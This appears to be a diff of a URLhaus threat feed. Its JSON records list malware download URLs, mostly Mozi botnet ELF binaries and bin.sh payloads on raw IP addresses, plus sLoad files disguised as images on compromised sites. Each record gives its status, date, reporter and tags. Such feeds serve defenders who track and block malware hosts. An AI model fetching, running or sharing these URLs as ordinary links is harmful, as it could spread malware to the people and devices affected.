+{"id":"961503","urlhaus_reference":"https://urlhaus.abuse.ch/url/961503/","url":"http://89.160.20.156:41319/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961496","urlhaus_reference":"https://urlhaus.abuse.ch/url/961496/","url":"http://89.160.20.156:51847/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961497","urlhaus_reference":"https://urlhaus.abuse.ch/url/961497/","url":"http://89.160.20.156:54469/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961498","urlhaus_reference":"https://urlhaus.abuse.ch/url/961498/","url":"http://89.160.20.156:34547/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961499","urlhaus_reference":"https://urlhaus.abuse.ch/url/961499/","url":"http://89.160.20.156:33932/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 20:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} {"id":"961494","urlhaus_reference":"https://urlhaus.abuse.ch/url/961494/","url":"https://univirtek.com/viro/02478080035/blank.jpg","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:51:47 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} {"id":"961495","urlhaus_reference":"https://urlhaus.abuse.ch/url/961495/","url":"https://univirtek.com/viro/FRRNDR77C25D325O/map.png","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:51:47 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} {"id":"961492","urlhaus_reference":"https://urlhaus.abuse.ch/url/961492/","url":"https://ladiesincode.com/ladi/CNNSRG83H04F158R/blank.jpg","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:51:45 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} @@ -143,528 +143,528 @@ {"id":"961407","urlhaus_reference":"https://urlhaus.abuse.ch/url/961407/","url":"https://hoagtechhydroponics.com/teco/LGTCDC74T45F205G/logo.png","url_status":"offline","host":"hoagtechhydroponics.com","date_added":"2021-01-14 20:47:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} {"id":"961404","urlhaus_reference":"https://urlhaus.abuse.ch/url/961404/","url":"https://belfetproduction.com/bella/00160060349/uk.jpg","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:42:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} {"id":"961405","urlhaus_reference":"https://urlhaus.abuse.ch/url/961405/","url":"https://belfetproduction.com/bella/01288650243/1x1.jpg","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:42:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} -{"id":"961403","urlhaus_reference":"https://urlhaus.abuse.ch/url/961403/","url":"http://117.251.59.53:50611/bin.sh","url_status":"online","host":"117.251.59.53","date_added":"2021-01-14 20:39:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961402","urlhaus_reference":"https://urlhaus.abuse.ch/url/961402/","url":"http://60.243.120.169:45371/Mozi.a","url_status":"online","host":"60.243.120.169","date_added":"2021-01-14 20:36:14 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961400","urlhaus_reference":"https://urlhaus.abuse.ch/url/961400/","url":"http://61.54.50.155:50093/Mozi.m","url_status":"online","host":"61.54.50.155","date_added":"2021-01-14 20:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961401","urlhaus_reference":"https://urlhaus.abuse.ch/url/961401/","url":"http://59.95.175.109:36652/Mozi.m","url_status":"online","host":"59.95.175.109","date_added":"2021-01-14 20:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961397","urlhaus_reference":"https://urlhaus.abuse.ch/url/961397/","url":"http://42.235.65.235:54182/Mozi.m","url_status":"online","host":"42.235.65.235","date_added":"2021-01-14 20:36:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961398","urlhaus_reference":"https://urlhaus.abuse.ch/url/961398/","url":"http://222.137.177.178:46048/Mozi.m","url_status":"online","host":"222.137.177.178","date_added":"2021-01-14 20:36:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961399","urlhaus_reference":"https://urlhaus.abuse.ch/url/961399/","url":"http://222.137.232.114:33953/Mozi.m","url_status":"online","host":"222.137.232.114","date_added":"2021-01-14 20:36:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961393","urlhaus_reference":"https://urlhaus.abuse.ch/url/961393/","url":"http://182.117.10.46:36447/Mozi.a","url_status":"online","host":"182.117.10.46","date_added":"2021-01-14 20:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961394","urlhaus_reference":"https://urlhaus.abuse.ch/url/961394/","url":"http://171.38.193.49:36828/Mozi.m","url_status":"online","host":"171.38.193.49","date_added":"2021-01-14 20:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961395","urlhaus_reference":"https://urlhaus.abuse.ch/url/961395/","url":"http://202.111.130.185:55281/Mozi.m","url_status":"online","host":"202.111.130.185","date_added":"2021-01-14 20:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961396","urlhaus_reference":"https://urlhaus.abuse.ch/url/961396/","url":"http://119.102.83.85:49772/Mozi.m","url_status":"online","host":"119.102.83.85","date_added":"2021-01-14 20:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961391","urlhaus_reference":"https://urlhaus.abuse.ch/url/961391/","url":"http://117.222.165.246:50229/Mozi.m","url_status":"offline","host":"117.222.165.246","date_added":"2021-01-14 20:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961392","urlhaus_reference":"https://urlhaus.abuse.ch/url/961392/","url":"http://117.222.170.34:39996/Mozi.m","url_status":"online","host":"117.222.170.34","date_added":"2021-01-14 20:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961387","urlhaus_reference":"https://urlhaus.abuse.ch/url/961387/","url":"http://113.239.210.87:50195/Mozi.a","url_status":"online","host":"113.239.210.87","date_added":"2021-01-14 20:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961388","urlhaus_reference":"https://urlhaus.abuse.ch/url/961388/","url":"http://115.62.159.229:52447/Mozi.a","url_status":"online","host":"115.62.159.229","date_added":"2021-01-14 20:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961389","urlhaus_reference":"https://urlhaus.abuse.ch/url/961389/","url":"http://113.90.237.126:56321/Mozi.m","url_status":"online","host":"113.90.237.126","date_added":"2021-01-14 20:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961390","urlhaus_reference":"https://urlhaus.abuse.ch/url/961390/","url":"http://115.219.146.151:54620/Mozi.m","url_status":"online","host":"115.219.146.151","date_added":"2021-01-14 20:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961386","urlhaus_reference":"https://urlhaus.abuse.ch/url/961386/","url":"http://60.7.65.79:52064/Mozi.a","url_status":"online","host":"60.7.65.79","date_added":"2021-01-14 20:23:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961385","urlhaus_reference":"https://urlhaus.abuse.ch/url/961385/","url":"http://59.93.16.88:47401/Mozi.m","url_status":"offline","host":"59.93.16.88","date_added":"2021-01-14 20:22:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961382","urlhaus_reference":"https://urlhaus.abuse.ch/url/961382/","url":"http://59.95.174.61:46527/Mozi.m","url_status":"online","host":"59.95.174.61","date_added":"2021-01-14 20:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961383","urlhaus_reference":"https://urlhaus.abuse.ch/url/961383/","url":"http://59.93.21.239:38132/Mozi.m","url_status":"offline","host":"59.93.21.239","date_added":"2021-01-14 20:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961384","urlhaus_reference":"https://urlhaus.abuse.ch/url/961384/","url":"http://45.176.111.252:59015/Mozi.m","url_status":"online","host":"45.176.111.252","date_added":"2021-01-14 20:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961379","urlhaus_reference":"https://urlhaus.abuse.ch/url/961379/","url":"http://222.137.176.198:59454/Mozi.m","url_status":"online","host":"222.137.176.198","date_added":"2021-01-14 20:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961380","urlhaus_reference":"https://urlhaus.abuse.ch/url/961380/","url":"http://42.232.233.146:37883/Mozi.m","url_status":"online","host":"42.232.233.146","date_added":"2021-01-14 20:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961381","urlhaus_reference":"https://urlhaus.abuse.ch/url/961381/","url":"http://42.234.255.164:55209/Mozi.m","url_status":"online","host":"42.234.255.164","date_added":"2021-01-14 20:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961378","urlhaus_reference":"https://urlhaus.abuse.ch/url/961378/","url":"http://182.59.96.114:41062/Mozi.m","url_status":"online","host":"182.59.96.114","date_added":"2021-01-14 20:21:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961377","urlhaus_reference":"https://urlhaus.abuse.ch/url/961377/","url":"http://211.226.185.30:60380/i","url_status":"online","host":"211.226.185.30","date_added":"2021-01-14 20:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} -{"id":"961375","urlhaus_reference":"https://urlhaus.abuse.ch/url/961375/","url":"http://195.87.190.106:54796/Mozi.m","url_status":"online","host":"195.87.190.106","date_added":"2021-01-14 20:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961376","urlhaus_reference":"https://urlhaus.abuse.ch/url/961376/","url":"http://183.188.139.70:35251/Mozi.m","url_status":"online","host":"183.188.139.70","date_added":"2021-01-14 20:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961373","urlhaus_reference":"https://urlhaus.abuse.ch/url/961373/","url":"http://117.222.173.201:50562/Mozi.m","url_status":"offline","host":"117.222.173.201","date_added":"2021-01-14 20:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961374","urlhaus_reference":"https://urlhaus.abuse.ch/url/961374/","url":"http://117.215.248.158:33445/Mozi.m","url_status":"online","host":"117.215.248.158","date_added":"2021-01-14 20:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961370","urlhaus_reference":"https://urlhaus.abuse.ch/url/961370/","url":"http://120.85.197.148:60280/Mozi.a","url_status":"online","host":"120.85.197.148","date_added":"2021-01-14 20:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961371","urlhaus_reference":"https://urlhaus.abuse.ch/url/961371/","url":"http://182.126.66.149:46386/Mozi.m","url_status":"online","host":"182.126.66.149","date_added":"2021-01-14 20:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961372","urlhaus_reference":"https://urlhaus.abuse.ch/url/961372/","url":"http://182.113.4.64:60288/Mozi.m","url_status":"online","host":"182.113.4.64","date_added":"2021-01-14 20:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961368","urlhaus_reference":"https://urlhaus.abuse.ch/url/961368/","url":"http://113.116.144.14:49731/Mozi.a","url_status":"online","host":"113.116.144.14","date_added":"2021-01-14 20:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961369","urlhaus_reference":"https://urlhaus.abuse.ch/url/961369/","url":"http://115.56.186.224:38837/Mozi.a","url_status":"online","host":"115.56.186.224","date_added":"2021-01-14 20:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961366","urlhaus_reference":"https://urlhaus.abuse.ch/url/961366/","url":"http://115.48.159.43:37814/Mozi.m","url_status":"online","host":"115.48.159.43","date_added":"2021-01-14 20:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961367","urlhaus_reference":"https://urlhaus.abuse.ch/url/961367/","url":"http://115.50.233.247:47507/Mozi.m","url_status":"online","host":"115.50.233.247","date_added":"2021-01-14 20:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961365","urlhaus_reference":"https://urlhaus.abuse.ch/url/961365/","url":"http://115.58.39.251:47140/i","url_status":"online","host":"115.58.39.251","date_added":"2021-01-14 20:18:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961363","urlhaus_reference":"https://urlhaus.abuse.ch/url/961363/","url":"http://42.224.170.54:41514/Mozi.a","url_status":"online","host":"42.224.170.54","date_added":"2021-01-14 20:10:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961364","urlhaus_reference":"https://urlhaus.abuse.ch/url/961364/","url":"http://42.235.100.87:58748/Mozi.m","url_status":"online","host":"42.235.100.87","date_added":"2021-01-14 20:10:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961362","urlhaus_reference":"https://urlhaus.abuse.ch/url/961362/","url":"http://175.168.229.209:51183/Mozi.m","url_status":"online","host":"175.168.229.209","date_added":"2021-01-14 20:10:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961361","urlhaus_reference":"https://urlhaus.abuse.ch/url/961361/","url":"http://182.119.164.30:42104/Mozi.m","url_status":"online","host":"182.119.164.30","date_added":"2021-01-14 20:10:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961354","urlhaus_reference":"https://urlhaus.abuse.ch/url/961354/","url":"http://42.224.52.56:53130/Mozi.m","url_status":"online","host":"42.224.52.56","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961355","urlhaus_reference":"https://urlhaus.abuse.ch/url/961355/","url":"http://58.255.134.250:57768/Mozi.m","url_status":"online","host":"58.255.134.250","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961356","urlhaus_reference":"https://urlhaus.abuse.ch/url/961356/","url":"http://42.230.54.138:34541/Mozi.m","url_status":"online","host":"42.230.54.138","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961357","urlhaus_reference":"https://urlhaus.abuse.ch/url/961357/","url":"http://219.156.51.117:51344/Mozi.a","url_status":"online","host":"219.156.51.117","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961358","urlhaus_reference":"https://urlhaus.abuse.ch/url/961358/","url":"http://42.234.186.111:40084/Mozi.m","url_status":"online","host":"42.234.186.111","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961359","urlhaus_reference":"https://urlhaus.abuse.ch/url/961359/","url":"http://58.249.73.109:60457/Mozi.m","url_status":"online","host":"58.249.73.109","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961360","urlhaus_reference":"https://urlhaus.abuse.ch/url/961360/","url":"http://27.41.5.197:34906/Mozi.a","url_status":"online","host":"27.41.5.197","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961353","urlhaus_reference":"https://urlhaus.abuse.ch/url/961353/","url":"http://176.113.161.71:59847/Mozi.m","url_status":"online","host":"176.113.161.71","date_added":"2021-01-14 20:10:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961352","urlhaus_reference":"https://urlhaus.abuse.ch/url/961352/","url":"http://122.165.112.82:47873/Mozi.m","url_status":"offline","host":"122.165.112.82","date_added":"2021-01-14 20:09:00 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961349","urlhaus_reference":"https://urlhaus.abuse.ch/url/961349/","url":"http://125.44.12.28:48645/Mozi.m","url_status":"online","host":"125.44.12.28","date_added":"2021-01-14 20:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961350","urlhaus_reference":"https://urlhaus.abuse.ch/url/961350/","url":"http://120.56.112.117:36524/Mozi.a","url_status":"online","host":"120.56.112.117","date_added":"2021-01-14 20:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961351","urlhaus_reference":"https://urlhaus.abuse.ch/url/961351/","url":"http://117.192.227.212:38726/Mozi.m","url_status":"online","host":"117.192.227.212","date_added":"2021-01-14 20:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961345","urlhaus_reference":"https://urlhaus.abuse.ch/url/961345/","url":"http://120.85.209.116:41149/Mozi.m","url_status":"online","host":"120.85.209.116","date_added":"2021-01-14 20:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961346","urlhaus_reference":"https://urlhaus.abuse.ch/url/961346/","url":"http://123.4.140.121:46993/Mozi.m","url_status":"online","host":"123.4.140.121","date_added":"2021-01-14 20:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961347","urlhaus_reference":"https://urlhaus.abuse.ch/url/961347/","url":"http://125.47.246.253:39190/Mozi.m","url_status":"online","host":"125.47.246.253","date_added":"2021-01-14 20:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961348","urlhaus_reference":"https://urlhaus.abuse.ch/url/961348/","url":"http://115.59.222.67:48344/Mozi.a","url_status":"online","host":"115.59.222.67","date_added":"2021-01-14 20:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961344","urlhaus_reference":"https://urlhaus.abuse.ch/url/961344/","url":"http://125.133.102.126:58427/bin.sh","url_status":"online","host":"125.133.102.126","date_added":"2021-01-14 20:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} -{"id":"961343","urlhaus_reference":"https://urlhaus.abuse.ch/url/961343/","url":"http://115.55.179.98:41921/i","url_status":"online","host":"115.55.179.98","date_added":"2021-01-14 20:02:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961342","urlhaus_reference":"https://urlhaus.abuse.ch/url/961342/","url":"http://115.58.39.251:47140/bin.sh","url_status":"online","host":"115.58.39.251","date_added":"2021-01-14 19:55:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961341","urlhaus_reference":"https://urlhaus.abuse.ch/url/961341/","url":"http://61.3.126.151:34789/Mozi.m","url_status":"online","host":"61.3.126.151","date_added":"2021-01-14 19:52:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961340","urlhaus_reference":"https://urlhaus.abuse.ch/url/961340/","url":"http://59.94.182.91:37634/Mozi.m","url_status":"online","host":"59.94.182.91","date_added":"2021-01-14 19:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961339","urlhaus_reference":"https://urlhaus.abuse.ch/url/961339/","url":"http://58.249.22.65:41636/Mozi.m","url_status":"online","host":"58.249.22.65","date_added":"2021-01-14 19:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961338","urlhaus_reference":"https://urlhaus.abuse.ch/url/961338/","url":"http://222.141.10.143:32907/Mozi.m","url_status":"online","host":"222.141.10.143","date_added":"2021-01-14 19:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961336","urlhaus_reference":"https://urlhaus.abuse.ch/url/961336/","url":"http://27.198.22.182:57568/Mozi.a","url_status":"online","host":"27.198.22.182","date_added":"2021-01-14 19:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961337","urlhaus_reference":"https://urlhaus.abuse.ch/url/961337/","url":"http://42.224.136.106:40740/Mozi.m","url_status":"online","host":"42.224.136.106","date_added":"2021-01-14 19:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961331","urlhaus_reference":"https://urlhaus.abuse.ch/url/961331/","url":"http://42.224.41.9:35927/Mozi.m","url_status":"online","host":"42.224.41.9","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961332","urlhaus_reference":"https://urlhaus.abuse.ch/url/961332/","url":"http://39.77.229.65:55558/Mozi.m","url_status":"online","host":"39.77.229.65","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961333","urlhaus_reference":"https://urlhaus.abuse.ch/url/961333/","url":"http://27.209.112.112:60558/Mozi.m","url_status":"online","host":"27.209.112.112","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961334","urlhaus_reference":"https://urlhaus.abuse.ch/url/961334/","url":"http://222.139.17.39:59624/Mozi.m","url_status":"online","host":"222.139.17.39","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 